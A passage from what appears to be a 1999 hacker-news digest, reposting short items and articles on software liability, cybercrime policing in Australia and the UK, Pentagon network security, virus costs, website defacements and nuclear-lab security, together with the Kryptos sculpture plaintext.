DPTOSABCDEFGHIJLMNQUVWXZKRYPTOS ETOSABCDEFGHIJLMNQUVWXZKRYPTOSA FOSABCDEFGHIJLMNQUVWXZKRYPTOSAB GSABCDEFGHIJLMNQUVWXZKRYPTOSABC HABCDEFGHIJLMNQUVWXZKRYPTOSABCD IBCDEFGHIJLMNQUVWXZKRYPTOSABCDE JCDEFGHIJLMNQUVWXZKRYPTOSABCDEF KDEFGHIJLMNQUVWXZKRYPTOSABCDEFG LEFGHIJLMNQUVWXZKRYPTOSABCDEFGH MFGHIJLMNQUVWXZKRYPTOSABCDEFGHI NGHIJLMNQUVWXZKRYPTOSABCDEFGHIJ OHIJLMNQUVWXZKRYPTOSABCDEFGHIJL PIJLMNQUVWXZKRYPTOSABCDEFGHIJLM QJLMNQUVWXZKRYPTOSABCDEFGHIJLMN RLMNQUVWXZKRYPTOSABCDEFGHIJLMNQ SMNQUVWXZKRYPTOSABCDEFGHIJLMNQU TNQUVWXZKRYPTOSABCDEFGHIJLMNQUV UQUVWXZKRYPTOSABCDEFGHIJLMNQUVW VUVWXZKRYPTOSABCDEFGHIJLMNQUVWX WVWXZKRYPTOSABCDEFGHIJLMNQUVWXZ XWXZKRYPTOSABCDEFGHIJLMNQUVWXZK YXZKRYPTOSABCDEFGHIJLMNQUVWXZKR ZZKRYPTOSABCDEFGHIJLMNQUVWXZKRY H I N T O F T H E D A Y “Kryptos” Completed Plaintext. Top Half. BETWEEN SUBTLE SHADING AND THE ABSENCE OF LIGHT LIES THE NUANCE OF ILLUSION. THEY USED THE EARTH’S MAGNETIC FIELD. THE INFORMATION WAS GATHERED AND TRANSMITTED UNDERGROUND TO AN UNKNOWN LOCATION. DOES LANGLEY KNOW ABOUT THIS? THEY SHOULD ITS BURIED OUT THERE SOMEWHERE. ONLY WW. THIS WAS HIS LAST MESSAGE. THIRTY-EIGHT DEGREES FIFTY-SEVEN MINUTES SIX POINT FIVE SECONDS NORTH SEVENTY-SEVEN DEGREES EIGHT MINUTES FORTY-FOUR SECONDS WEST ID BY ROWS. (Bottom Half) SLOWLY DESPARATLY SLOWLY THE REMAINS OF PASSAGE DEBRIS THAT ENCUMBERED THE LOWER PART OF THE DOORWAY WAS REMOVED WITH TREMBLING HANDS I MADE A TINY BREACH IN THE UPPER LEFT HAND CORNER AND THEN WIDENING THE HOLE A LITTLE I INSERTED THE CANDLE AND PEERED IN THE HOT AIR ESCAPING FROM THE CHANBER CAUSED THE FLAME TO FLICKER BUT PRESENTLY DETAILS OF THE ROOM WITHIN EMERGED FROM THE MIST. CAN YOU SEE ANYTHINGQ? @HWA 65.0 Pirates of Silicon Valley ~~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ Pirates of Silicon Valley contributed by Silicosis 'Pirates of Silicon Valley' airs on TNT this Sunday at 8pm. The show is supposed to detail the history of Apple & Microsoft. While this info is going to be plastered everywhere else, it may be worth watching (if you have nothing better to do, after all, they are old school hackers. TNT http://tnt.turner.com/movies/tntoriginals/pirates/ If you missed this show its available on the web via the newsgroups, not that I condone such activity - Ed ;) @HWA 66.0 .mil hacker cartoon ~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ Cartoon contributed by carole Here is a rather funny carton, found in a rather interestingly funny place. www.nswc.navy.mil http://www.nswc.navy.mil/ISSEC/Gif/cartoons/hacked.gif ** This url is of course, dead now. Anyone have a copy of the gif?, i'll check PacketStorm too... @HWA 67.0 If Software Breaks Who is Liable? . ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Companies that manufacture toasters, cars, and other products are liable for defects in their goods but not software companies. According to the license agreements you agree to when installing software the manufacture is not liable for anything. Software is often shipped with humongous problems that the manufacturer knew about yet there is no accountability. Boston Globe http://www.globe.com/dailyglobe2/171/focus/You_lose_+.shtml COMMERCE You lose! Cars and toasters are expected to work. But bad software is a norm, and the industry wants to keep it that way By Charles Palson, 06/20/99 he engine in your new car self-destructs after a five-minute drive. The dealer later tells you the manufacturer knowingly produced the defect, but you have to pay for a new engine anyway. That's because the automakers convinced Congress that consumer protection laws would drive up car prices beyond the reach of the average buyer, so the laws were changed to exempt the companies. Sound like B-grade fiction? Unfortunately, the answer is: not for the American software industry. Their intention is clearly stated in the licensing agreement displayed on your monitor when you install new software. Clicking OK means you agree that the manufacturer bears no responsibility for defects. Did you find features that don't work as advertised? Truth-in-advertising laws don't apply. Did the program erase your hard drive? So what. Did the manufacturer have prior knowledge of 95 percent of all the defects beforehand, the industry average? Irrelevant. You might be able to return the product, but your time, whatever it is worth, is lost. It's the law. But not according to some courts, which have recently declared these licenses illegal because they contradict provisions in the Uniform Commercial Code, the grandfather of all consumer-protection laws. The software industry, seeing where this liability could lead, now wants to exclude itself from the minimal consumer protections offered under the code. Its argument? Perfect or error-free software would be either impossible or too expensive to produce. ''Perfect'' was carefully chosen for its emotional effect. After all, everyone knows that achieving perfection is beyond any mortal. But it's a false argument. The Uniform Commercial Code doesn't mention anything about perfection; it states in essence that a product should be fit for ordinary use and conform to printed claims. If other American industries have managed to conform to the code, why should software be any different? Several reputable specialists this writer interviewed don't think it should be. One of these, Ken Johnson, who is director of Minnesota's Rochester Technology Center, a division of D.H. Andrews Inc., and who is a former IBM software executive, is sure that software companies can produce top-quality products. Johnson should know. He helped manage a now legendary project that produced the IBM AS400 computer. A huge effort at the time, the developers delivered on schedule, and any significant defects were fixed in a timely manner. And the price was reasonable. Actually, counting both direct and indirect costs, the AS400 still costs significantly less than comparable products from other companies, and it delivers more reliability. The lesson is that, contrary to what industry spokesmen claim, high quality at reasonable prices is indeed possible. With a few notable exceptions, however, the industry as a whole chooses to continue producing software riddled with defects that often make a mockery of extravagant advertising claims. Microsoft, for example, shows every intention of continuing the practice of publicizing features that don't necessarily work. Not one word on the well-known issue can be found in company president Steve Ballmer's recent lengthy announcement that quality will take center stage. When this writer questioned spokewoman Marla Polenz on the issue, she couldn't find anyone to talk about it. Perhaps nothing more eloquently illustrates the problems in Microsoft than the fact that it cannot readily use its own flagship business product, NT Server, for some mission-critical applications, such as shipping, because it is too unreliable. According to several people close to IBM and Microsoft, the latter uses AS400s when reliability really counts. Gartner Group studies tracking computer reliability say that average downtime for NT Servers is more than a half-hour per day, compared with a fraction of a second for the AS400. That's a lot of lost revenue in a year. But it should be emphasized that this is not just a Microsoft problem. Cem Kaner, lawyer, former software engineer, and nationally known spokesman on software quality, stresses that the great majority of companies knowingly issue software with substantial defects. He, along with many other observers, estimates that software manufacturers already know 95 percent of all the bugs when they put their programs on the market. Why the quality gap between IBM and so many other companies? According to Kaner, the answer in principle is simple: Product quality sometimes takes a back seat to getting products out the door for immediate profit. The whole story, however, is more complex. The problem starts at the beginning of a project when managers invariably underestimate the development time requirements by a wide margin. When the projected completion date arrives, pressure builds from anxious marketing and financial departments that have made commitments based on the promised date. Often, the product is finally released under pressure despite defects. The nature of the problem is well known in the industry. Roger Sherman, former Microsoft director of testing, acknowledged, for example, that bad schedules are responsible for most quality problems. How has IBM largely found a resolution? According to Johnson, the operative word is experience. Lots of it. Key development personnel at IBM have carefully worked in different capacities on many successful projects. These people have acquired through experience the knowledge it takes to make useful time estimates. They know it is a little more expensive to take such necessary measures to produce the first product version, but they also know that, in the long run, it is less expensive because the considerable costs associated with defects drop dramatically. ''The AS400 development team created and still adheres to meticulous quality practices,'' says Johnson. A shift to more reliable software will not be easy. In any industry described by observers as freewheeling, young and brash, the word ''meticulous'' might as well be Sanskrit. Computer science departments don't teach its practical meaning, and most software developers lack even the awareness that quality, accurate scheduling, and reasonable cost are not mutually contradictory. But the point remains: Optimal software quality is doable, and any protestations to the contrary are, well, whining. Without even the currently minimal penalties under the Uniform Commercial Code, the industry would have even less incentive to reform itself. Indeed, some observers, such as Mark Paulk, professor at the computer science department of Carnegie Mellon University, believe that the code should have stricter provisions to increase the penalties for poor software quality. If the industry felt the pain currently only felt by consumers, the pain would be a positive impetus for change. This story ran on page E01 of the Boston Globe on 06/20/99. © Copyright 1999 Globe Newspaper Company. @HWA 68.0 Trinux Release 0.61 ~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by mdfranz Besides upgrading to glibc2 and Linux kernel 2.2.x, Trinux 0.61 now offers remote package loading via wget, updated versions of many of the tools you know and love (such as nmap and ntop) and new additions like hping, cgichk, mns, and SAINT (well, at least the scanner's underneath, who needs the sorry Web/CGI interface). Just like before, all on 2 floppies and without disturbing the other operating systems on your PC. The standard kernel now provides support for the most common Ethernet cards and with more reliable DHCP support, booting Trinux from your school/office PC has never been easier. Trinux http://www.trinux.org 69.0 Australia Looks to Increase Local Police Powers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by Code Kid The Electronic Transactions Bill, expected to be introduced in the Australian Parliament in the spring session, will give local police departments more authority when investigating computer crimes. Many computer crimes involve computer trespass and criminal damage neither of which has extra-territorial provisions. This new bill will give police powers to investigate crimes even when they originate outside their normal jurisdictions. The Age http://www.theage.com.au/daily/990620/news/news11.html Police may go after interstate hackers By DAVID ADAMS The State Government is considering giving police greater powers to investigate computer hackers operating from interstate. Because hacking normally involves offences of computer trespass and criminal damage - neither of which has extra-territorial provisions - police have limited powers to pursue hackers who attack Victorian companies from interstate. Under the Draft Electronic Commerce Framework Bill, released for public comment in December, it was proposed that the new offences of unlawful access to data in a computer and of damaging data in a computer be introduced into the Victorian Crimes Act 1958. The draft bill also provided for police in Victoria to investigate people interstate committing the new offences provided there was a substantial link to Victoria. The period of public consultation ended in February. The bill, since renamed the Electronic Transactions Bill, is expected to be introduced in Parliament in the spring session. A spokesman for the Minister for Information and Multimedia, Mr Alan Stockdale, said that he could not disclose what was in the bill until it was presented in Parliament. But he said there had been considerable consultation. The head of the Victoria Police computer crime investigation squad, Detective Senior Sergeant David Caldwell, said that it was less common for hackers to operate across state borders than inside their own state. He said that most hacking incidents in Victoria were motivated by curiosity rather than malice but organised gangs of hackers and individuals were known to deliberately target companies. Reasons included revenge or notoriety. In one case last year, a Glen Waverley man known by the name of ``Number Crunch'' claimed to have broken into the computer systems of 1300 companies in all Australian capital cities in a two-week hacking spree that caused $130,000 damage. Each time the man entered a company's computer system, he left behind a message informing it of its victim number and asking it to report the invasion to one of two telephone numbers, those of Melbourne television Channels 9 and 7. Detective Senior Sergeant Caldwell said that hacking had been identified as one of the greatest security threats facing companies, but some companies still appeared to have a ``false sense of security''. Last year, a joint Victoria Police and Deloitte Touche Tohmatsu survey found that 11per cent of companies failed to have any security policy in place when connecting to the Internet. In the poll of about 90 of Australia's largest companies, one-third said their computer systems had been attacked in the previous 12 months. Of those, 58per cent were attacked from an external source. Sixty-four per cent of companies said that hacking was the greatest security concern in the future. @HWA 70.0 Aussie Gov Downloads Porn ~~~~~~~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond The Australian Protective Service, similar in function to the US Secret Service has found that six of its members downloaded pornography over the internet while on the job. The Australian Defense Department is conducting an investigation. 32 Bits Online http://www.32bitsonline.com/news.php3?news=news/199906/nb199906175&page=1 Australian Govt Security Officers Caught Downloading Porn Officers in the Australian Protective Service, the Federal Government's protective security agency, are being investigated after a "routine" sweep found they had downloaded pornography from the Internet while on duty. The Australian Defence Department is conducting the inquiry into the use of Defence Department computers in its Canberra headquarters to download pornographic images by six officers, according to the Australian Broadcasting Corporation (ABC). A spokesman told the ABC that the incidents were not considered a serious breach of security but an investigation would ensue, with all APS officers banned from using the department's Internet links while it is conducted. The APS is responsible for the protection of Parliament House in Canberra, the residences of the Prime Minister and the Governor-General, foreign diplomatic missions, airport security and defense establishments around Australia. The use of government computers to access pornography on the Internet was highlighted recently by an adult Website operator. The site owner publicized the Internet domain names of a number of Australian government agencies, including the Defence Department, that regularly accessed the adult site in protest at Australian Internet legislation that requires ISPs to block and filter access to material on the Internet (Newsbytes, May 28, 1999). @HWA 71.0 Software Glitch or Security Breach ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond When all else fails claim a 'hacker' did it. After some customers received discounts of as much as 85%, Microworkz faxed at least one customer claiming that their security had been breached. Later when contacted by a reporter they denied it and claimed it was due to a software problem. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2279360,00.html?chkpt=zdnnstop 72.0 Viruses Cost Companies Big Dough ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by nvirB In the first two quarters of 1999 viruses have costs US businesses 7.6 billion in lost revenue. Computer Economics of Carlsbad, California has completed a study that says the amount can be attributed to computer downtime and the expense of dealing with the virus infestations. Wired http://www.wired.com/news/news/technology/story/20297.html Fox Market Wire http://foxmarketwire.com/061999/virus.sml Computer Economics, Inc. http://www.computereconomics.com/ Wired; Viruses Cost Big Bucks Wired News Report 12:20 p.m. 18.Jun.99.PDT Businesses worldwide have lost a total of US$7.6 billion in the first two quarters of 1999 at the hands of Melissa, the Explore.Zip worm and other viruses, a new study finds. Computer Economics of Carlsbad, California said the costs resulted from lost productivity due to computer downtime, and the expense of dealing with virus attacks. The study also predicted that the frequency of the attacks will continue at the current rate, and that systems failures could be more severe. Computer Economics polled 185 large companies and totaled their combined losses. Michael Erbschloe, vice president of research for Computer Economics, said that companies must make an investment in security to prevent further damage from viruses. "We've surveyed people in IT organizations for the last 12 years," Erbschloe said. "We're constantly getting the response that computer security is underfunded." -=- Fox Market Wire; Computer Virus Costs to Business Surge 11.09 a.m. ET (1509 GMT) June 19, 1999 NEW YORK — Computer virus and "worm" attacks on information systems have caused businesses to lose a total of $7.6 billion in the first half of 1999 as a result of disabled computers, a research firm said Friday The cost of viruses and worms — computer bugs spread by e-mail that can cause system shutdowns — was about five times larger in the first six months of 1999 than businesses suffered during all of last year, said Computer Economics Inc. The most recent study was based on 185 companies representing 900,000 international users, while the 1998 survey used slightly different methodology, researcher Michael Erbschloe said. "The numbers probably came out low," he said. "It is a conservative number in that not everyone tracks cost, and most companies tend to undercount and underreport." He said the $7.6 billion figure represented lost productivity and repair costs reported by the company. The 1998 figure of about $1.5 billion also included "intrusions" to corporate systems, in addition to general virus attacks. Erbschloe said this year's high profile attacks by ExploreZip worm, which erased computer files and caused the shutdown of some corporate e-mail systems, and the Melissa virus, which spread quickly but did not destroy data, would only draw more attacks. "Hackers don't like to be outdone," he said. "And most companies are underfunding their security efforts." -=- @HWA 73.0 B4B0 Issue 8 Released. ~~~~~~~~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by tip The latest and greatest issue of B4B0 has been released. Articles discuss issues on system/network security, humor, as well as dementia. Their primary focus has always been the liberation of normalcy, and hopefully the redline youth of the world will turn the new trend in the gospel sound. B4B0 http://www.b4b0.org @HWA 74.0 f41th Issue 7 ~~~~~~~~~~~~~~ June 21st 1999 From HNN http://www.hackernews.com/ contributed by D4RKCYDE D4RKCYDE have released f41th issue 7, the 3rd installment to the magazine. This issue contains even more than before, with in-depth articles such as '5ESS Compact Digital Exchanges' and 'Chronus ICMP Packet Timestamps' with much, much more. f41th http://darkcyde.system7.org 75.0 DOD Considers New Network ~~~~~~~~~~~~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ contributed by dis-crete In an effort to defend against frequent cyber attacks, the Pentagon is considering building a new computer network to handle e-commerce and public web pages, cutting off existing connections to the Internet. This follows an increase in the rate of successful attacks on the Non-Classified Internet Protocol Router Network (NIPRNET). While a separate network sounds like a good idea in theory the practicalities of completely separating NIPRNET from the Internet will not be easy. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0621/fcw-newsnetwork-6-21-99.html JUNE 21, 1999 Cyberattacks spur talk of 3rd DOD network New network would support e-commerce and public access to DOD Web sites BY BOB BREWIN (antenna@fcw.com)< AND DANIEL VERTON (dan_verton@fcw.com) As part of a strategy to defend its unclassified networks against relentless cyberattacks, the Pentagon may establish a new network to handle electronic commerce and other interactions with the public while cutting off all other existing connections to the Internet. The proposal follows an increase in the rate of cyberattacks -- many stemming from the Kosovo conflict -- on the Non-Classified Internet Protocol Router Network (NIPRNET), through which the department transmits unclassified information, including some tactical data, via the Internet. Marv Langston, deputy assistant secretary of Defense for command, control, communications and intelligence (C3I), said top DOD officials have begun debating whether to disconnect NIPRNET from the Internet and create another network, a so-called third layer, which would provide Internet links between DOD and e-commerce partners and provide the public with access to military Web pages. The proposed strategy, under debate by DOD officials, would leave the department with three layers of networks: the Secret Internet Protocol Router Network, for classified information; NIPRNET, which would become a virtual private network for internal DOD communications; and the new network, through which the department would communicate with its business partners and the public. John Hamre, deputy secretary of Defense, framed the issues behind the policy debate in stark terms last week, calling the short air campaign in Yugoslavia against Serbia "the first cyberwar," citing Serb attacks against NATO's public World Wide Web pages. "We were under a cyberattack in our operations against Serbia," Hamre said at last week's GovTechNet International Conference and Exhibition. DOD is vulnerable to such attacks because the department "routinely operates in commercial cyberspace" using NIPRNET, he said. Lt. Gen. William Campbell, the Army's director for C3I, called the current NIPRNET policy "close to madness" because it is used to actively support military operations. Campbell, who would like to see DOD set up the third-layer network, said the Pentagon should not compromise the security of NIPRNET to support e-commerce and interactions with the public. "The [e-commerce] tail should not wag the C3I dog," Campbell said. Tim Bass, president and chief executive officer of the security consulting firm The Silk Road Group Ltd., said the third layer is a very wise plan. "Denial-of-service attacks against [Internet Protocol] networks are a real threat, and there is no disagreement that IP is highly vulnerable," Bass said. "Furthermore, nonclassified IP access to the Internet is now a mission-critical requirement." Rick Forno, a security officer for Network Solutions Inc. and a former senior security analyst at the House of Representatives' Information Resources Security Office, also said DOD's plan is plausible. "All public-access networks should be on a completely compartmented environment from anything [classified "For Official Use Only"] or higher, including day-to-day routine local-area networks," he said. If properly carried out, the policy "will be a great solution," Forno said. However, the proposed strategy is not without some obstacles, DOD officials said. Langston, who also serves as DOD's deputy chief information officer, which gives him a key role in the network security policy debate, said, "It is difficult to unplug [DOD] from the Internet." Establishing a third layer would, in essence, set up another U.S., if not global, DOD network, which would be expensive, Langston said. Langston advocates protecting NIPRNET by copying a Navy initiative to secure networks with an array of technology, including intrusion-detection systems, firewalls and encryption technology. The Navy has developed its "defense in-depth" strategy as part of an effort to build a secure Navywide intranet. Langston believes the strategy obviates the need to pull the Internet plug except under the most extreme circumstances. "The only reason to pull off the Internet is a massive cyberattack," Langston said. Rear Adm. John Gauss, commander of the Space and Naval Warfare Systems Command, supports an ongoing NIPRNET redesign, which would involve the Defense Information Systems Agency upgrading the network's security measures. "What DISA's doing will protect DOD computing and still give us a viable means of communicating with industry," Gauss said. Lt. Gen. William Donahue, director of communications and information for the Air Force, agreed that disconnecting NIPRNET from the Interent is not a viable option. "We're not going to disconnect from the Internet because we depend on it for too much," he said. But, he added, "You have to balance the need to connect with the need to protect." Although a decision has not yet been made about the third network, Donahue envisions DOD reaching a stage where it initially will shut down all connections between NIPRNET and the Internet, closing all "back door" connections, and then reconnect DOD with a smaller number of open connections. "There will probably be a finite number of connections to the Internet, and they will be protected," Donahue said. When that occurs, DOD still will need "to be serious, dedicated, dogged and persistent in protecting our network nodes," he said. But Campbell will continue to push to cut off DOD from the Internet. "If you are going to be a pioneer...you cannot be faint of heart." @HWA 76.0 NCIS Calls For National Computer Crime Squad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ contributed by Code Kid The UK National Criminal Intelligence Service (NCIS) has called for the creation of a national cyber force in England to fight the increasing amount of online crime. While the Metro police in London do have a computer crime unit there is no national organization. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_375000/375156.stm Sci/Tech Cyber criminals feel the heat By Internet Correspondent Chris Nuttall A national cyberforce of computer specialists is needed to combat a rising tide of online crime, according to a major report by the UK National Criminal Intelligence Service (NCIS). Project Trawler, a three-year study of Internet crime, foresees a struggle between criminals and those trying to prevent illegal activities over the mastery of Net technology and information. It says crimes currently being committed include paedophilia, pornography, hacking, hate sites, fraud and software piracy. Criminals' use of the Net for secure communications is an emerging problem. Interception powers being eroded The director general of NCIS, John Abbott, told a news conference: "I believe that serious consideration should be given to the establishment of a national investigative computer crime unit to combat the growing number of computer crimes being carried out in the UK and to identify and target emerging threats. "Furthermore, any such unit should be intelligence-led, separating out the minor offenders from those with both the motivation and capability to commit serious crimes." On the day the Home Office released a consultation paper on the review of the Interception of Communications Act, the report says existing capabilities to lawfully intercept communications and search seized computers will be eroded by the Internet. "Potentially this would seriously damage law enforcement's ability to fight serious and organised crime," it says. Home Secretary to bolster interception The Home Secretary, Jack Straw, said he was determined his proposals would "maintain interception as the most powerful weapon in the armoury against crime." "It often provides the vital intelligence or the crucial piece of the jigsaw in solving such crimes with on average, one in two interception warrants resulting in an arrest", he said. "But in recent years their capability has come under threat - sophisticated criminals and terrorists have been quick to exploit a revolutionised communications industry and dated legislation on interception." The proposals, detailed on the Home Office Website, include creating a single legal framework to regulate interception of all networks both public and private, wireless telegraphy and interception of mail. Encryption expertise needed Regarding Project Trawler's recommendations, the Metropolitan Police in London has a computer crime unit, but there is no such national organisation. MPs of the Trade and Industry Select Committee said last month there was a case for such a body in order to combat criminals using encryption to organise their illegal activities over the Internet. NCIS says a national unit would investigate the most serious offences, develop Internet expertise and support local forces encountering sophisticated cybercrimes. Call for international co-operation Given the global reach of the Net, the report emphasises that international co-operation is also vital. This includes combined law enforcement operations, extra-territorial jurisdiction and consistent extradition of criminals. It points out that last year's Operation Cathedral had demonstrated the effectiveness of co-ordinated international action by law enforcement against paedophile rings. This involves both exchanging information at the preliminary stage and preventing paedophiles tipping off other ring members when arrests and seizures are made. The creation of a central library of known paedophilic images at an international level would both aid the search for victims and help to determine the nature of offences, it says. Cyber complaints on the rise NCIS suggests that filed complaints of cyber crimes have risen from 12,000 in 1997 to more than 40,000 in 1998. But, in an apparent reference to media coverage of the Internet, it says it does not assess the risks or scale of criminal activity on the Internet to be as extensive as sometime portrayed. The report's author , David Hart, says there is a need for preventative steps now to avoid having to deal with a bigger problem later: "If the rewards are great enough and the risks low enough then undoubtedly established criminals will migrate to the new territory of the Internet. "But, at the moment, even if they had the motivation, it's not evident that they have the capability to commit serious computer crimes. They could recruit or coerce people who do have the capabilities but there are associated risks with that." Future threats NCIS says the 1990 Computer Misuse Act allows for penalties of up to five years in jail and unlimited fines. In future, it says, offences inspired by political motives, hacking for information with financial value and "work rage" assaults on systems will feature more. The approach of the year 2000 is likely to spur some program writers to create viruses triggered by the 01/01/2000 date. Project Trawler will be available on the NCIS Website in an unclassified version. The full report with extensive statistics will be available to to law enforcement agencies and government departments. Report welcomed by cyber rights group "The conclusions of the report and a multi-layered approach is welcome for dealing with cybercrimes rather than heavy-handed government regulation," said Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties (UK), reacting to Project Trawler. " However, all these initiatives within the layers proposed should take into account the rights and liberties of Internet users." He said the concerns expressed about the ability to intercept communications revealed law enforcement bodies were still worried about the use of cryptography for criminal purposes. "Overall the publication of the report is welcome and most of the future problems may be avoided and prevented by the use and development of better security tools. Therefore the use and development of encryption tools should be encouraged rather than controlled for the prevention of cyber-crimes" @HWA 77.0 !Hispahack Found Not Guilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ contributed by LeCreme The trial against !Hispahack member Jfs finished on June 2nd. The Spanish judge considered not guilty the only !Hispahack member that was accused of breaking into a university computer. This was the first case of unauthorized computer intrusion ever judged in Spain. !Hispahack http://hispahack.ccc.de/en/index.htm 78.0 asahi.com Defaced ~~~~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ contributed by YingYang One of the major news sites in Japan, Asahi Shimbun Publishing Co.'s "asahi.com" was defaced in the last few days. The most interesting thing in this article is the claim that the news site has suffered several cyber intrusions in the past but that this was the first one to cause damage. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/74419 Asahi Shimbun's News Site Suffers Illegal Access June 22, 1999 (TOKYO) -- Asahi Shimbun Publishing Co.'s news site "asahi.com" was accessed illegally and could not display the home page in a standard way for a few minutes on June 20. According to Asahi Shimbun, the problem occurred because an outside person gained illegal access to one of the company's several mirror servers.

Within about 10 minutes, the mirror server was separated off, and a switch was made to the other servers. An investigation is focusing on the detailed circumstances and cause of the incident. From June 20 to the morning of June 21, the company reinforced its surveillance setup. A full- fledged investigation was set to start June 21, according to the company. Asahi Shimbun's www.asahi.com has been subjected to illegal access a few times, but the previous cases ended without causing any substantive damage. This was the first time that the content was actually written over.

As for illegal access to a newspaper company's news site and rewriting of the top page, another incident occurred recently in Japan. Mainichi Newspapers Co., Ltd.'s www.mainichi.co.jp, Mainichi INTERACTIVE suffered such a case on June 12. (BizTech News Dept.) @HWA 79.0 NSTAC Releases Reports ~~~~~~~~~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ contributed by lamer The National Security Telecommunications Advisory Committee has released several new reports detailing various aspects of federal computer security and infrastructure. NSTAC http://www.ncs.gov/nstac/NSTACReports.html @HWA 80.0 FBI This Week ~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ FBI This Week contributed by ne0h "FBI, This Week" is the name of the radio program broadcast to over 3,200 ABC Radio Network affiliates. This weeks episode is all about International Computer Crime. If you miss the broadcast on your local station a real player version is available. FBI This Week http://www.fbi.gov/pressrm/radio/fbiweek.htm @HWA 81.0 Cartoon Hackers?? (From HNN rumours section) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 22nd 1999 From HNN http://www.hackernews.com/ contributed by delchi WB Scraps 'Real Hackers' Cartoon Rumor has it that Warner Brothers and Mattel have scrapped an idea for a new Saturday morning cartoon with a tie in toy line called "Real Hackers". The defunct storyline was to portray a group of real life hackers in cartoon form, reformed and fighting for good. Amongst the hackers to be represented were 'phiber optik', 'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld pond' as cyber warriors as they fought criminals bent on destroying the internet. It is unknown why Warner Brothers and Mattel scrapped this idea or if it even existed in the first place but in this hot pre Christmas marketplace, one can only wonder how long it will be before this ground breaking idea starts making money for somebody. @HWA 82.0 Nuke Labs Stand Down ~~~~~~~~~~~~~~~~~~~~ June 23rd 1999 From HNN http://www.hackernews.com/ contributed by Dr. Mudge Yesterday was one of two stand down day at the national weapons labs (Los Alamos, Sandia, LLNL, etc), ordered by Energy Secretary Bill Richardson. This means that due to the pressure and publicity from the Cox/PFIAB reports no normal work was allowed at the labs. Only emergency and operational tasks were to be continued - 16 hours of training courses, web tests, discussion groups, etc. over a two day period take everything elses place. The training dealt with review of existing security efforts, everything from operational to computer security is being discussed, dissected, and hopefully digested. While this may be an excellent way to educate employees one can only hope that network security monitoring and analysis is considered essential daily activity. Albuquerque Journal http://www.abqjournal.com/news/1secrets06-21.htm Future of Nuclear Weapons Program in Dispute By Jim Abrams The Associated Press WASHINGTON -- The head of a presidential panel on nuclear weapons security, backed by congressional Republicans, says security problems within the Department of Energy can't be fixed without creating a new semi-independent agency to oversee nuclear arms programs But Energy Secretary Bill Richardson said he is successfully confronting the security lapses revealed in investigations of suspected Chinese spying at weapons laboratories, and that no new agency is needed. "We are ready to have a beefed-up security entity within the Department of Energy that is stronger," Richardson said on "Fox News Sunday." "What I don't want is a new agency that is autonomous that does not report to me." But former Sen. Warren Rudman, R-N.H., who chaired a panel of the president's Foreign Intelligence Advisory Board that issued a highly critical report of the DOE's counterintelligence efforts last week, said the department has failed to carry out two key security measures that President Clinton ordered 16 months ago. It has yet to fully implement polygraph tests for scientists at the labs and tighter security checks for foreign visitors, Rudman said on NBC's "Meet the Press." "The attitude of people within that department, in that bureaucracy, is astounding," he added. The Washington Post reported today that the federal government has begun administering polygraphs on the first of 5,000 nuclear weapons scientists and other sensitive employees at DOE. It could take four years to complete an initial round of examinations on the federal workers and private contractors working with highly classified nuclear secrets, said Edward J. Curran, head of Energy's counterintelligence office. So far, only that office's staff has been given the tests, he said. Richardson told the Post some employees and civil liberties groups are likely to protest the polygraphs and "I fully expect lawsuits." Richardson said there were still problems to resolve but "we have had dramatic improvements." He said he ordered a two-day stand-down at all the nuclear labs to test security measures, and that he plans to dismiss some people responsible for security lapses in about three weeks. Richardson last week also named retired Air Force Gen. Eugene Habiger, the former commander of all U.S. strategic nuclear forces, to head security operations at DOE. The president of the University of California, Richard C. Atkinson, has ordered a review of security at the three nuclear laboratories managed by the university to make sure national security is not being compromised. The FBI has investigated allegations that a former employee of Los Alamos National Laboratory was a spy for China. The university also manages Lawrence Livermore National Laboratory and Lawrence Berkeley National Laboratory. Atkinson has asked his Council on National Laboratories to examine whether newly tightened measures are being implemented and whether additional measures are needed. He also wants to compare the university's security to the protocol used by Lockheed Martin, which manages Sandia National Laboratories in Albuquerque. Rudman, meanwhile, is expected to receive a good reception Tuesday when he testifies to Congress on his panel's recommendation that the weapons program become semi-autonomous, reporting only to the energy secretary. "I agree with the Rudman report," said Sen. Richard Shelby, R-Ala., chairman of the Senate Intelligence Committee. "We've said all along that the labs are not safe today. They're not safe tomorrow." Richardson, he said, is trying to "seal the leaks at the labs. He's trying to bring accountability to the labs. But I believe it's going to take statutory change to do it. I don't believe ultimately he can do it just by himself." Shelby said Republican Sens. Frank Murkowski of Alaska, Jon Kyl of Arizona and Pete Domenici of New Mexico would try to attach language on such a separation of powers to an intelligence spending bill coming before the Senate soon. @HWA 83.0 X-Force Down Under is Hiring 